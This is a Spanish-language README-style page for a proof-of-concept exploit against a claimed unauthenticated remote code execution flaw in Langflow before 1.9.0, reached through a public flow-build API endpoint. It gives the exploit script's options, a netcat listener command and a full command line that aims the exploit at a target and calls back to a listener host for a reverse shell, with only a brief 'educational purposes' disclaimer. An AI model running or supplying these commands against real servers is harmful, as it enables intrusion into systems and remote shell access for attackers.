
Exploit CVE-2026-33017 | por infrar3d
Explotado por infrar3d
Este exploit de prueba de concepto apunta a una vulnerabilidad crítica de Ejecución Remota de Código (RCE) en versiones de Langflow anteriores a la 1.9.0. La vulnerabilidad permite a atacantes no autenticados ejecutar comandos arbitrarios del sistema inyectando código Python malicioso a través del endpoint de la API de construcción de flujos. La vulnerabilidad existe en el endpoint /api/v1/build_public_tmp/{flow_id}/flow endpoint, que sanea incorrectamente el código proporcionado por el usuario en el campo code de las plantillas de componentes.
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]
Langflow RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target base URL
-f, --flow FLOW Flow ID
-H, --host HOST Listener host for reverse shell
-P, --port PORT Listener port (default: 4444)
La primera terminal (listener):
nc -lvnp 4444
La segunda terminal (exploit):
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444
Este software y el código de prueba de concepto se proporcionan solo con fines educativos y de investigación.
Usted es responsable de cumplir con todas las leyes aplicables. Úsela de forma ética y responsable.